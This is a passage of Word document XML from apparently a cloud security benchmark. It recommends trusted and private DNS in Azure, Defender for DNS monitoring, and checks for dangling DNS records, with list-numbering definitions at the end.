          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>Initial Access (TA0001)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="05DD1769" w14:textId="1B56669D" w:rsidR="005A2E4F" w:rsidRDefault="005A2E4F" w:rsidP="00CB27F3">
      <w:pPr>
        <w:pStyle w:val="Heading4"/>
        <w:numPr>
          <w:ilvl w:val="3"/>
          <w:numId w:val="1"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="005A2E4F">
        <w:t>NS-10.1: Use trusted DNS service</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="42F12054" w14:textId="6B57C1CA" w:rsidR="00094254" w:rsidRDefault="00094254" w:rsidP="00094254">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="36"/>
        </w:numPr>
        <w:ind w:left="2160"/>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00094254">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>Use trusted DNS services to ensure clients receive correct resolution</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7B9FEF42" w14:textId="4B47563B" w:rsidR="00094254" w:rsidRDefault="00094254" w:rsidP="00094254">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="3"/>
        </w:numPr>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00094254">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>Use Azure recursive DNS or trusted external DNS</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1C150734" w14:textId="4803B713" w:rsidR="00094254" w:rsidRDefault="006C0AB4" w:rsidP="006C0AB4">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="35"/>
        </w:numPr>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="006C0AB4">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>Configure workloads to use Azure recursive DNS (168.63.129.16) or trusted external DNS servers in VM operating systems or application DNS settings to ensure reliable name resolution.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5A208280" w14:textId="7B58ED4E" w:rsidR="006C0AB4" w:rsidRDefault="006C0AB4" w:rsidP="006C0AB4">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="3"/>
        </w:numPr>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="006C0AB4">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>Allow Azure DNS in firewall rules</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6D1086D1" w14:textId="5A46E722" w:rsidR="006C0AB4" w:rsidRDefault="006C0AB4" w:rsidP="006C0AB4">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="35"/>
        </w:numPr>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="006C0AB4">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>Add 168.63.129.16 to firewall and NSG allow lists to ensure proper DNS functionality for Azure resources.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0FECC0F6" w14:textId="7AFCD112" w:rsidR="008E5214" w:rsidRDefault="008E5214" w:rsidP="008E5214">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="3"/>
        </w:numPr>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="008E5214">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>Host domains on Azure DNS</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6A5DEA76" w14:textId="20D544D0" w:rsidR="008E5214" w:rsidRDefault="008E5214" w:rsidP="008E5214">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="35"/>
        </w:numPr>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="008E5214">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>Use Azure DNS to host domain resolution for authoritative DNS needs, providing reliable and scalable DNS hosting (note: Azure DNS does not provide domain registration service).</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3C2FAFB9" w14:textId="1A09A47A" w:rsidR="008E5214" w:rsidRDefault="008E5214" w:rsidP="008E5214">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="3"/>
        </w:numPr>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="008E5214">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>Follow secure DNS deployment guidelines</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5A674AAC" w14:textId="30B7FFA4" w:rsidR="00CA22D1" w:rsidRDefault="00CA22D1" w:rsidP="00CA22D1">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="35"/>
        </w:numPr>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00CA22D1">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>If building custom DNS servers, follow NIST SP 800-81 Rev. 3 Secure Domain Name System (DNS) Deployment Guide to implement security best practices.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="14062334" w14:textId="6F386364" w:rsidR="00CA22D1" w:rsidRDefault="00CA22D1" w:rsidP="00CB27F3">
      <w:pPr>
        <w:pStyle w:val="Heading4"/>
        <w:numPr>
          <w:ilvl w:val="3"/>
          <w:numId w:val="1"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="00CA22D1">
        <w:t>NS-10.2: Use Private DNS in virtual network</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5F497380" w14:textId="60822FAB" w:rsidR="00AF6CFE" w:rsidRDefault="00AF6CFE" w:rsidP="00AF6CFE">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="37"/>
        </w:numPr>
        <w:ind w:left="2160"/>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00AF6CFE">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>Use Azure Private DNS to establish private DNS zones where DNS resolution remains within the virtual network</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="33D975FB" w14:textId="5304E561" w:rsidR="00AF6CFE" w:rsidRDefault="00AF6CFE" w:rsidP="00AF6CFE">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="3"/>
        </w:numPr>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00AF6CFE">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>Deploy Azure Private DNS for private resolution</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="66F911AE" w14:textId="7DA4DCE2" w:rsidR="00C21C55" w:rsidRPr="00CB27F3" w:rsidRDefault="00AF6CFE" w:rsidP="00C21C55">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="35"/>
        </w:numPr>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00CB27F3">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>Use Azure Private DNS to create private DNS zones that keep DNS resolution within the virtual network, ensuring queries never leave your network boundary.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6BFDA96F" w14:textId="5018C82C" w:rsidR="00C21C55" w:rsidRDefault="00C21C55" w:rsidP="00C21C55">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="3"/>
        </w:numPr>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00C21C55">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>Configure private DNS for private endpoints</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3A702D37" w14:textId="68B5B628" w:rsidR="00C21C55" w:rsidRDefault="00C21C55" w:rsidP="00C21C55">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="35"/>
        </w:numPr>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00C21C55">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>Configure private DNS zones for private endpoints to override public DNS resolution and ensure clients resolve private endpoint FQDNs to private IP addresses within the virtual network.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1ECAEE64" w14:textId="18B4D68B" w:rsidR="00C21C55" w:rsidRDefault="00C21C55" w:rsidP="00C21C55">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="3"/>
        </w:numPr>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00C21C55">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>Implement custom DNS for restricted resolution</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="43490C61" w14:textId="5EEB4363" w:rsidR="002F5241" w:rsidRDefault="002F5241" w:rsidP="002F5241">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="35"/>
        </w:numPr>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="002F5241">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>Use custom DNS servers to restrict DNS resolution to only allow trusted resolution sources for your clients, providing additional control over name resolution security.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3DC72ECF" w14:textId="04ADA215" w:rsidR="002F5241" w:rsidRDefault="002F5241" w:rsidP="00CB27F3">
      <w:pPr>
        <w:pStyle w:val="Heading4"/>
        <w:numPr>
          <w:ilvl w:val="3"/>
          <w:numId w:val="1"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="002F5241">
        <w:t>NS-10.3: Use Defender for DNS for advanced protection</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5EA27543" w14:textId="1C6D5140" w:rsidR="002F5241" w:rsidRDefault="00157C62" w:rsidP="00157C62">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="38"/>
        </w:numPr>
        <w:ind w:left="2160"/>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00157C62">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>Use Microsoft Defender for DNS to detect and alert on advanced DNS-based security threats</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="45F1CED3" w14:textId="1F90F60C" w:rsidR="00157C62" w:rsidRDefault="00157C62" w:rsidP="00157C62">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="3"/>
        </w:numPr>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00157C62">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>Enable Defender for DNS protection</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6F58454C" w14:textId="134C8562" w:rsidR="00157C62" w:rsidRDefault="00157C62" w:rsidP="00157C62">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="35"/>
        </w:numPr>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00157C62">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>Use Microsoft Defender for DNS (included in Defender for Servers Plan) to monitor and alert on suspicious DNS activity including data exfiltration via DNS tunneling, malware command-and-control communication, and interactions with malicious domains.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="727F722E" w14:textId="77777777" w:rsidR="00CB27F3" w:rsidRPr="00CB27F3" w:rsidRDefault="00CB27F3" w:rsidP="00CB27F3">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="5CF9ABBC" w14:textId="62983214" w:rsidR="000D4962" w:rsidRDefault="000D4962" w:rsidP="000D4962">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="3"/>
        </w:numPr>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="000D4962">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>Monitor for malicious DNS activity</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="60913C09" w14:textId="620451F6" w:rsidR="000D4962" w:rsidRDefault="000D4962" w:rsidP="000D4962">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="35"/>
        </w:numPr>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="000D4962">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>Configure alerts to detect communication with malicious DNS resolvers and DNS attacks that could compromise workload security or DNS service availability.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4AE35097" w14:textId="7BE623AD" w:rsidR="000D4962" w:rsidRDefault="000D4962" w:rsidP="000D4962">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="3"/>
        </w:numPr>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="000D4962">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>Detect dangling DNS records</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="006EF9F9" w14:textId="4AEECB72" w:rsidR="006F0CE2" w:rsidRPr="006C0AB4" w:rsidRDefault="006F0CE2" w:rsidP="006F0CE2">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="35"/>
        </w:numPr>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="006F0CE2">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>Use Microsoft Defender for App Service to identify dangling DNS records when decommissioning App Service websites, preventing subdomain takeover attacks by ensuring custom domains are removed from DNS registrars.</w:t>
      </w:r>
    </w:p>
    <w:sectPr w:rsidR="006F0CE2" w:rsidRPr="006C0AB4">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6FE45" w14:textId="77777777" w:rsidR="00901CAE" w:rsidRDefault="00901CAE" w:rsidP="00741C12">
      <w:pPr>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r>
        <w:separator/>
      </w:r>
    </w:p>
  </w:endnote>
  <w:endnote w:type="continuationSeparator" w:id="0">
    <w:p w14:paraId="07978263" w14:textId="77777777" w:rsidR="00901CAE" w:rsidRDefault="00901CAE"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ACA7B" w14:textId="77777777" w:rsidR="00901CAE" w:rsidRDefault="00901CAE" w:rsidP="00741C12">
      <w:pPr>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r>
        <w:separator/>
      </w:r>
    </w:p>
  </w:footnote>
  <w:footnote w:type="continuationSeparator" w:id="0">
    <w:p w14:paraId="2B2DFA85" w14:textId="77777777" w:rsidR="00901CAE" w:rsidRDefault="00901CAE"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3F55"/>
    <w:multiLevelType w:val="hybridMultilevel"/>
    <w:tmpl w:val="20A0F7B6"/>
    <w:lvl w:ilvl="0" w:tplc="ECA05E6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15:restartNumberingAfterBreak="0">
    <w:nsid w:val="0B783442"/>
    <w:multiLevelType w:val="hybridMultilevel"/>
    <w:tmpl w:val="F8B6EF96"/>
    <w:lvl w:ilvl="0" w:tplc="3182AB0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0126D0"/>
    <w:multiLevelType w:val="hybridMultilevel"/>
    <w:tmpl w:val="DB002446"/>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4" w15:restartNumberingAfterBreak="0">
    <w:nsid w:val="115B1121"/>
    <w:multiLevelType w:val="hybridMultilevel"/>
    <w:tmpl w:val="F222A86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15:restartNumberingAfterBreak="0">
    <w:nsid w:val="1AE57C49"/>
    <w:multiLevelType w:val="hybridMultilevel"/>
    <w:tmpl w:val="5046F18A"/>
    <w:lvl w:ilvl="0" w:tplc="BC76790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2C5D1659"/>
    <w:multiLevelType w:val="hybridMultilevel"/>
    <w:tmpl w:val="93522526"/>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0" w15:restartNumberingAfterBreak="0">
    <w:nsid w:val="2F7F6A24"/>
    <w:multiLevelType w:val="hybridMultilevel"/>
    <w:tmpl w:val="9A7E4C22"/>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1" w15:restartNumberingAfterBreak="0">
    <w:nsid w:val="2FE114A5"/>
    <w:multiLevelType w:val="hybridMultilevel"/>
    <w:tmpl w:val="B4CA59E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6AF1E75"/>
    <w:multiLevelType w:val="hybridMultilevel"/>
    <w:tmpl w:val="B7F02370"/>
    <w:lvl w:ilvl="0" w:tplc="EDB266F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15:restartNumberingAfterBreak="0">
    <w:nsid w:val="4268529B"/>
    <w:multiLevelType w:val="hybridMultilevel"/>
    <w:tmpl w:val="EB582EA6"/>
    <w:lvl w:ilvl="0" w:tplc="88AE225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4FA94911"/>
    <w:multiLevelType w:val="hybridMultilevel"/>
    <w:tmpl w:val="853CF904"/>
    <w:lvl w:ilvl="0" w:tplc="EB40BDEC">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15:restartNumberingAfterBreak="0">
    <w:nsid w:val="559277C8"/>
    <w:multiLevelType w:val="hybridMultilevel"/>
    <w:tmpl w:val="F2A675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5767417E"/>
    <w:multiLevelType w:val="hybridMultilevel"/>
    <w:tmpl w:val="173008F4"/>
    <w:lvl w:ilvl="0" w:tplc="BF62B58C">
      <w:start w:val="1"/>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5A06631A"/>
    <w:multiLevelType w:val="hybridMultilevel"/>
    <w:tmpl w:val="F048A200"/>
    <w:lvl w:ilvl="0" w:tplc="C7B6105C">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0160779"/>
    <w:multiLevelType w:val="hybridMultilevel"/>
    <w:tmpl w:val="69428702"/>
    <w:lvl w:ilvl="0" w:tplc="70C6F3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61177EB6"/>
    <w:multiLevelType w:val="hybridMultilevel"/>
    <w:tmpl w:val="337EEF9E"/>
    <w:lvl w:ilvl="0" w:tplc="6B7C10B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 w15:restartNumberingAfterBreak="0">
    <w:nsid w:val="62896FB2"/>
    <w:multiLevelType w:val="hybridMultilevel"/>
    <w:tmpl w:val="D48EC73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670D283B"/>
    <w:multiLevelType w:val="hybridMultilevel"/>
    <w:tmpl w:val="E28A591A"/>
    <w:lvl w:ilvl="0" w:tplc="05FA93C2">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 w15:restartNumberingAfterBreak="0">
    <w:nsid w:val="67420FA6"/>
    <w:multiLevelType w:val="hybridMultilevel"/>
    <w:tmpl w:val="F2E60F12"/>
    <w:lvl w:ilvl="0" w:tplc="C74EB15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676C63ED"/>
    <w:multiLevelType w:val="hybridMultilevel"/>
    <w:tmpl w:val="A8CAC268"/>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32"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67B96EED"/>
    <w:multiLevelType w:val="hybridMultilevel"/>
    <w:tmpl w:val="7B168D26"/>
    <w:lvl w:ilvl="0" w:tplc="4512169A">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4" w15:restartNumberingAfterBreak="0">
    <w:nsid w:val="68EF69E9"/>
    <w:multiLevelType w:val="hybridMultilevel"/>
    <w:tmpl w:val="D2187672"/>
    <w:lvl w:ilvl="0" w:tplc="F7A4D72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6"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900168602">
    <w:abstractNumId w:val="28"/>
  </w:num>
  <w:num w:numId="2" w16cid:durableId="1392381683">
    <w:abstractNumId w:val="25"/>
  </w:num>
  <w:num w:numId="3" w16cid:durableId="1244028379">
    <w:abstractNumId w:val="22"/>
  </w:num>
  <w:num w:numId="4" w16cid:durableId="483930371">
    <w:abstractNumId w:val="5"/>
  </w:num>
  <w:num w:numId="5" w16cid:durableId="1255746737">
    <w:abstractNumId w:val="11"/>
  </w:num>
  <w:num w:numId="6" w16cid:durableId="209091">
    <w:abstractNumId w:val="21"/>
  </w:num>
  <w:num w:numId="7" w16cid:durableId="2016035579">
    <w:abstractNumId w:val="9"/>
  </w:num>
  <w:num w:numId="8" w16cid:durableId="1109356120">
    <w:abstractNumId w:val="18"/>
  </w:num>
  <w:num w:numId="9" w16cid:durableId="762847902">
    <w:abstractNumId w:val="6"/>
  </w:num>
  <w:num w:numId="10" w16cid:durableId="636111782">
    <w:abstractNumId w:val="3"/>
  </w:num>
  <w:num w:numId="11" w16cid:durableId="1709792915">
    <w:abstractNumId w:val="0"/>
  </w:num>
  <w:num w:numId="12" w16cid:durableId="882907666">
    <w:abstractNumId w:val="31"/>
  </w:num>
  <w:num w:numId="13" w16cid:durableId="758138027">
    <w:abstractNumId w:val="10"/>
  </w:num>
  <w:num w:numId="14" w16cid:durableId="1957827383">
    <w:abstractNumId w:val="16"/>
  </w:num>
  <w:num w:numId="15" w16cid:durableId="1639921967">
    <w:abstractNumId w:val="20"/>
  </w:num>
  <w:num w:numId="16" w16cid:durableId="1001852928">
    <w:abstractNumId w:val="19"/>
  </w:num>
  <w:num w:numId="17" w16cid:durableId="643584292">
    <w:abstractNumId w:val="36"/>
  </w:num>
  <w:num w:numId="18" w16cid:durableId="605038884">
    <w:abstractNumId w:val="34"/>
  </w:num>
  <w:num w:numId="19" w16cid:durableId="1059279877">
    <w:abstractNumId w:val="4"/>
  </w:num>
  <w:num w:numId="20" w16cid:durableId="1349675184">
    <w:abstractNumId w:val="29"/>
  </w:num>
  <w:num w:numId="21" w16cid:durableId="275185681">
    <w:abstractNumId w:val="15"/>
  </w:num>
  <w:num w:numId="22" w16cid:durableId="1937667947">
    <w:abstractNumId w:val="24"/>
  </w:num>
  <w:num w:numId="23" w16cid:durableId="650867341">
    <w:abstractNumId w:val="8"/>
  </w:num>
  <w:num w:numId="24" w16cid:durableId="1679963440">
    <w:abstractNumId w:val="32"/>
  </w:num>
  <w:num w:numId="25" w16cid:durableId="817261738">
    <w:abstractNumId w:val="1"/>
  </w:num>
  <w:num w:numId="26" w16cid:durableId="622922253">
    <w:abstractNumId w:val="35"/>
  </w:num>
  <w:num w:numId="27" w16cid:durableId="42023104">
    <w:abstractNumId w:val="7"/>
  </w:num>
  <w:num w:numId="28" w16cid:durableId="159198375">
    <w:abstractNumId w:val="14"/>
  </w:num>
  <w:num w:numId="29" w16cid:durableId="957638586">
    <w:abstractNumId w:val="33"/>
  </w:num>
  <w:num w:numId="30" w16cid:durableId="1998915829">
    <w:abstractNumId w:val="13"/>
  </w:num>
  <w:num w:numId="31" w16cid:durableId="1922176026">
    <w:abstractNumId w:val="23"/>
  </w:num>
  <w:num w:numId="32" w16cid:durableId="1098450903">
